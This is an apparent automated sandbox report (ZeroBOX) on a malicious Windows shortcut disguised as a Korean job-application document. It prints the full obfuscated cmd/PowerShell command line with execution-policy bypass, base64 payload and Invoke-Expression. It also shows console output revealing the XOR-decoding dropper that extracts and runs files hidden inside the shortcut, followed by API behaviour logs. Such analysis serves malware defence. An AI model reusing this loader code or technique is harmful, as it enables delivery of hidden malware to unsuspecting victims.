Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 9, 2024, 6:13 p.m.	July 9, 2024, 6:15 p.m.

Size	17.1KB
Type	MS Windows shortcut, Has command line arguments, Icon number=0, Archive, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`21d12dc7f08752293847af6ed19df0e3`
SHA256	`e7e73a5133cd61c077f85c44e9efeb8c24af9f1bfc140be4a2a59fdf33693d0d`
CRC32	`2FE20498`
ssdeep	`384:7zg3zQM8sR1eD0N2zUmdXf6Japc9XxFxgPpWcY3Jc+:fg3zb8sR1Uc3apmKPHY3u+`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "SvDjmYYOk" "C:\Users\test22\AppData\Local\Temp\근로신청서 관련의 건.docx.lnk"
2640
- cmd.exe "C:\windows\system32\cmd.exe" /c set s=posuiheihcksuehhfhell & call %s:suiheihcksuehhf=wers% -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x0000448a;$mviubse='UsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh3e8uyhgsoikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbG';$euhksjbdibiwybfkjsnsfefcv = [Convert]::FromBase64String($a+$mviubse);$isuhef = -join ($euhksjbdibiwybfkjsnsfefcv -as [char[]]); .('{0}{3}{1}{4}{2}'-f 'Inv','ke-Expre','n','o','ssio') $isuhef;
  2756
  - powershell.exe powershell -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x0000448a;$mviubse='UsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh3e8uyhgsoikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbG';$euhksjbdibiwybfkjsnsfefcv = [Convert]::FromBase64String($a+$mviubse);$isuhef = -join ($euhksjbdibiwybfkjsnsfefcv -as [char[]]); .('{0}{3}{1}{4}{2}'-f 'Inv','ke-Expre','n','o','ssio') $isuhef;
    2852

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 9, 2024, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 9, 2024, 6:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 6:13 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 9, 2024, 6:13 p.m.			0	0

Command line console output was observed (50 out of 209 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: Select-Object : A parameter cannot be found that matches parameter name 'SkipLa console_handle: 0x00000023	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: st'. console_handle: 0x0000002f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: At line:1 char:829 console_handle: 0x0000003b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: + $lnkpath = Get-ChildItem *.lnk \| where-object {$_.length -eq $tl} \| Select-Ob console_handle: 0x00000047	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ject -ExpandProperty Name; if($lnkpath.count -eq 0){$lnkpath = Get-ChildItem $e console_handle: 0x00000053	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: nv:TEMP\\.lnk \| where-object {$_.length -eq $tl};};$file = gc $lnkpath -Encod console_handle: 0x0000005f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ing Byte; $fileSize = $file.count;$i=$ol; console_handle: 0x0000006b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: while($i -lt $fileSize){$bXor=$file[$i];$bRun=$file[$i+1];$dwPathL console_handle: 0x00000077	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: en=[bitconverter]::ToInt32($file, $i+2);$dwDataLen=[bitconverter]::ToInt32($fil console_handle: 0x00000083	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: e, $i+6);$fi=10; for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dw console_handle: 0x0000008f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: DataLen); $p++){ $file[$p] = $file[$p] -bxor $bXor};[byte[]]$pathHex = $file[($ console_handle: 0x0000009b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: i+$fi)..($i+$fi+$dwPathLen-1)];$path = [System.Text.Encoding]::ASCII.GetString( console_handle: 0x000000a7	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: $file[($i+$fi)..($i+$fi+$dwPathLen-2)]); sc $path ([byte[]]($file \| select -Ski console_handle: 0x000000b3	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: p ($i+$fi+$dwPathLen) \| select -SkipLast <<<< ($fileSize-$i-$fi-$dwPathLen-$dw console_handle: 0x000000bf	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: DataLen))) -Encoding Byte;if($bRun){&$path;}$i=$i+$fi+$dwPathLen+$dwDataLen;} console_handle: 0x000000cb	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Select-Object], ParameterB console_handle: 0x000000d7	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: indingException console_handle: 0x000000e3	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm console_handle: 0x000000ef	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ands.SelectObjectCommand console_handle: 0x000000fb	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: Select-Object : A parameter cannot be found that matches parameter name 'SkipLa console_handle: 0x00000023	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: st'. console_handle: 0x0000002f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: At line:1 char:829 console_handle: 0x0000003b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: + $lnkpath = Get-ChildItem *.lnk \| where-object {$_.length -eq $tl} \| Select-Ob console_handle: 0x00000047	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ject -ExpandProperty Name; if($lnkpath.count -eq 0){$lnkpath = Get-ChildItem $e console_handle: 0x00000053	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: nv:TEMP\\.lnk \| where-object {$_.length -eq $tl};};$file = gc $lnkpath -Encod console_handle: 0x0000005f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ing Byte; $fileSize = $file.count;$i=$ol; console_handle: 0x0000006b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: while($i -lt $fileSize){$bXor=$file[$i];$bRun=$file[$i+1];$dwPathL console_handle: 0x00000077	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: en=[bitconverter]::ToInt32($file, $i+2);$dwDataLen=[bitconverter]::ToInt32($fil console_handle: 0x00000083	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: e, $i+6);$fi=10; for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dw console_handle: 0x0000008f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: DataLen); $p++){ $file[$p] = $file[$p] -bxor $bXor};[byte[]]$pathHex = $file[($ console_handle: 0x0000009b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: i+$fi)..($i+$fi+$dwPathLen-1)];$path = [System.Text.Encoding]::ASCII.GetString( console_handle: 0x000000a7	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: $file[($i+$fi)..($i+$fi+$dwPathLen-2)]); sc $path ([byte[]]($file \| select -Ski console_handle: 0x000000b3	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: p ($i+$fi+$dwPathLen) \| select -SkipLast <<<< ($fileSize-$i-$fi-$dwPathLen-$dw console_handle: 0x000000bf	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: DataLen))) -Encoding Byte;if($bRun){&$path;}$i=$i+$fi+$dwPathLen+$dwDataLen;} console_handle: 0x000000cb	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Select-Object], ParameterB console_handle: 0x000000d7	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: indingException console_handle: 0x000000e3	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm console_handle: 0x000000ef	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ands.SelectObjectCommand console_handle: 0x000000fb	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: Select-Object : A parameter cannot be found that matches parameter name 'SkipLa console_handle: 0x00000023	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: st'. console_handle: 0x0000002f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: At line:1 char:829 console_handle: 0x0000003b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: + $lnkpath = Get-ChildItem *.lnk \| where-object {$_.length -eq $tl} \| Select-Ob console_handle: 0x00000047	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ject -ExpandProperty Name; if($lnkpath.count -eq 0){$lnkpath = Get-ChildItem $e console_handle: 0x00000053	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: nv:TEMP\\.lnk \| where-object {$_.length -eq $tl};};$file = gc $lnkpath -Encod console_handle: 0x0000005f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: ing Byte; $fileSize = $file.count;$i=$ol; console_handle: 0x0000006b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: while($i -lt $fileSize){$bXor=$file[$i];$bRun=$file[$i+1];$dwPathL console_handle: 0x00000077	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: en=[bitconverter]::ToInt32($file, $i+2);$dwDataLen=[bitconverter]::ToInt32($fil console_handle: 0x00000083	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: e, $i+6);$fi=10; for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dw console_handle: 0x0000008f	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: DataLen); $p++){ $file[$p] = $file[$p] -bxor $bXor};[byte[]]$pathHex = $file[($ console_handle: 0x0000009b	1	1
WriteConsoleW July 9, 2024, 6:13 p.m.	buffer: i+$fi)..($i+$fi+$dwPathLen-1)];$path = [System.Text.Encoding]::ASCII.GetString( console_handle: 0x000000a7	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea918 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eb218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ead98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ead98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ead98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea9d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaed8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ea598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 6:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004eaa98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 9, 2024, 6:13 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 151 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02961000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02962000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
